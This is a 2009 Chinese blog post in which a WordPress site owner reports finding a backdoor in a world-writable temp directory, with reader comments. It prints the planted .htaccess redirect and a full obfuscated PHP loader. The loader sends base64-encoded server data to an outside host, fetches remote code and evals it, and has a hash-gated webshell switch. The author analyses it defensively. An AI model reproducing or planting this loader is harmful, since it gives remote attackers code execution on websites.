Skip to content

险,博客被挂马

2009 九月 22
tags:
by 荒野无灯

今天上FTP看下,有意外发现:
在wp-content/temp目录下多了两个文件:
php muma
其中.htaccess 内容如下:

1
2
Options -MultiViews
ErrorDocument 404 //blog/wp-content/temp/200892.php

php文件内容如下:

1
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="aea9e93f574c4e737df3db20658c710b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

这个temp目录我当时是为了方便更新插件把权限设置成了777,还好只有几个目录有写权限,而且后台禁止所有除我的ip以外的ip 地址访问。

我只解密了其中一个变量:

1
http://ads.rssnews.ws/?bmV0YmVhbnMuemhvdWJvLmNvbQ==.bmV0YmVhbnMuemhvdWJvLmNvbQ==.L3Rlc3QvZS5waHA=.L3Rlc3QvZS5waHA=...TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggaTY4NjsgZW4tVVM7IHJ2OjEuOS4wLjE0KSBHZWNrby8yMDA5MDkwMjE2IFVidW50dS85LjA0IChqYXVudHkpIEZpcmVmb3gvMy4wLjE0IEdUQjU=.MTkyLjE2OC4xLjI=.e.L2hvbWUvemhvdWJvL3dvcmtzcGFjZS9uZXRiZWFucy90ZXN0L2UucGhw.ZW4tdXMsZW47cT0wLjcsemgtY247cT0wLjM=

大概是用远程文件包含,然后再eval执行代码。而且貌似可以当作webshell控制:因为其中有这么一句:

1
isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="aea9e93f574c4e737df3db20658c710b") $f=$_REQUEST["id"]

从时间看是我暑假在家时被挂的马,那时我正好在家,没有连网,也没怎么查看FTP。
所有子其他子站点下只要是777的目录,都被挂了相同的马,而且那个php webshell 的文件名是随机生成的。
我猜测这可以是LP的服务器的问题。

ads.rssnews.wsIP为66.226.75.10
物理地址为“美国 加利福尼亚州“ ,也就是我现在服务器所在的地方。

喜欢这篇文章吗?

请订阅本站 RSS feed填写您的邮件地址,订阅我们的精彩内容:,欢迎点击这里捐赠以支持荒野无灯转播到腾讯微博 转播到腾讯微博

作者:荒野无灯
出处:Hacklog【Hacklog】

声明: 本站遵循 署名-非商业性使用-相同方式共享 3.0 共享协议. 转载请注明转自Hacklog【荒野无灯weblog】

本文链接: http://ihacklog.com/?p=2570

11 Responses Post a comment
  1. 八月 19, 2010

    不会吧
    wordpress也有漏洞

  2. 十一月 19, 2009

    十分的正确!你的主机没有装这个么?

  3. 十一月 19, 2009

    如果用suPHP的话777权限根本不让你运行

  4. 九月 27, 2009

    看不太懂,只知道内容用base64加密了。

  5. 九月 23, 2009

    不怎么懂!云里雾里!-

  6. 九月 22, 2009

    我的shopex网店也被挂过马,后来发现是主机抵抗力太差,立马换

    • 九月 22, 2009

      @万戈, 我估计我这主机抵抗力也不怎么样,还好是linux的服务器,要不然到处都要被挂马了,那就不只是权限为777的目录下有马了。
      Orz

Leave a Reply

Allowed Tags - You may use these HTML tags and attributes in your comment.

<a href="" title=""> <abbr title=""> <acronym title=""> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <q cite=""> <strong>

 :wink:  :-|  :-x  :twisted:  :)  8-O  :(  :roll:  :-P  :oops:  :-o  :mrgreen:  :lol:  :idea:  :-D  :evil:  :cry:  8)  :arrow:  :-?  :?:  :!:

Note: You may use basic HTML in your comments. Your email address will not be published.

Subscribe to this comment feed via RSS